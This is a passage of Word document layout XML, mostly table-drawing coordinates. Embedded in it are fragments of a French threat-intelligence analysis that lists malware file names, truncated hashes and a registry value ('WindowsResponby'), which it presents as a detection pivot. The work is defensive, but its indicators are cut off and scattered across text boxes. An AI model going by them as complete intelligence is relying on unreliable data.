                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="530224"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="530224"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="530224"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="530224"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="530224"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="530224"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="530224"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="530224"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="53022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360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9604" cy="351155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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351155">
                          <a:moveTo>
                            <a:pt x="3961129" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961129" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961129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3960494" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="396049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384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1342399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="3678555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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678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678555">
                          <a:moveTo>
                            <a:pt x="0" y="3402329"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3402329"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3678555"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3678555"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3402329"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2595245"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2595245"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3402964"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3402964"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2595245"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1758314"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1758314"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2595245"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2595245"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1758314"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1598295"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1598295"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1758314"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1758314"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1598295"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3961764" y="1591945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1591945"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="1591945"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1591945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="1591945"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1591945"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3961764" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="530859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="530859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="530859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="530859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3961764" y="530225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="530225"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="530225"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="530225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="530225"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="53022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69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5135889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="696594"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6965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696594">
                          <a:moveTo>
                            <a:pt x="4818379" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="696594"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="696594"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="69659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841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5833119</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="3715384"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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37153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3715384">
                          <a:moveTo>
                            <a:pt x="4818379" y="3715384"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="3715384"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="3715384"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="3715384"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="3715384"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="3715384"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3715384"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="3715384"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3715384"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="3184525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="3184525"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="3184525"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="3184525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="3184525"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="3184525"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3184525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="3184525"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3184525"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="1591945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="1591945"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="1591945"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="1591945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="1591945"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="1591945"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1591945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="1591945"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1591945"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="530224"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="530224"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="530224"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="530224"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="530224"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="530224"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="530224"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="530224"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="53022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456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36589" cy="1950719"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6589" cy="19507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6589" h="1950719">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="1950719"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1947545"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5736589" y="1947545"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1416684"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1416684"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="885824"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="885824"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="354964"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="354964"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5736589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5584" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4861560</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="1938019"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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380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38019">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="193801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6608" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6630670</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="1950719"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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507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50719">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="195071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8896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5135889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5736589" cy="4419599"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6589" cy="4419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6589" h="4419599">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="4419599"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="4416425"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5736589" y="4416425"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3885565"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="3885565"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3354705"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="3354705"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2823845"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="2823845"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2292985"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="2292985"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1762125"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1762125"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1231264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1231264"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="700405"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="700405"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5736589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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4234180</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5142239</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="4406899"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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406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406899">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="440689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1968" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5718810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5135889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="911863" cy="4419599"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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1863" cy="4419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1860" h="4419599">
                          <a:moveTo>
                            <a:pt x="911860" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="911860" y="4419599"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6350"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="441325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4016" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3512184</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3566169</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="12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6064" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2248535</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3566169</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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708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811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9136" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2237739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1323915" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5258435</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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11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1347100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3869201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0ef18003a27165cea2a6dffbf003baacbf3d4028dd822e3b51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2208" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4897120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1435365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1569459" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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45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Temp_saltsJcXads.dat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32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1523630</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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d4136945666fea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42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1877960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3869201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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76bb6dcd27672ec31d71e19d391ae8b5ac20916e545159a05e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5280" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4897120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1966225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="419030" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0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63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2054490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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ffdea1faca40bf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73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2408820</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3869201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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b269abc52c16c97eca56a88c19d9c14f00e1366383f7f20197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8352" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4897120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2497085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Temp:sensationa6K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93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2585350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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a8f395e323df87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3185818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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L'analyse de ces résultats montre que les opérateurs continuent d'utiliser les mêmes clés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1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3359173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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registre malgré des c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hangements fréque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nts des noms de fichiers et des mécanismes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2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3551143</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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déploiement. La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WindowsResponby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 apparaît comme le meilleur pivot, celle-ci étant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3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3747793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4532779" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3277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présente dans un nombre significativement plus important d'échantillons.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4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4022748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Afin d'élargir le corpus tout en limitant les faux positifs liés à d'anciennes campagnes,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5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4196103</wp:posOffset>
            </wp:positionV>
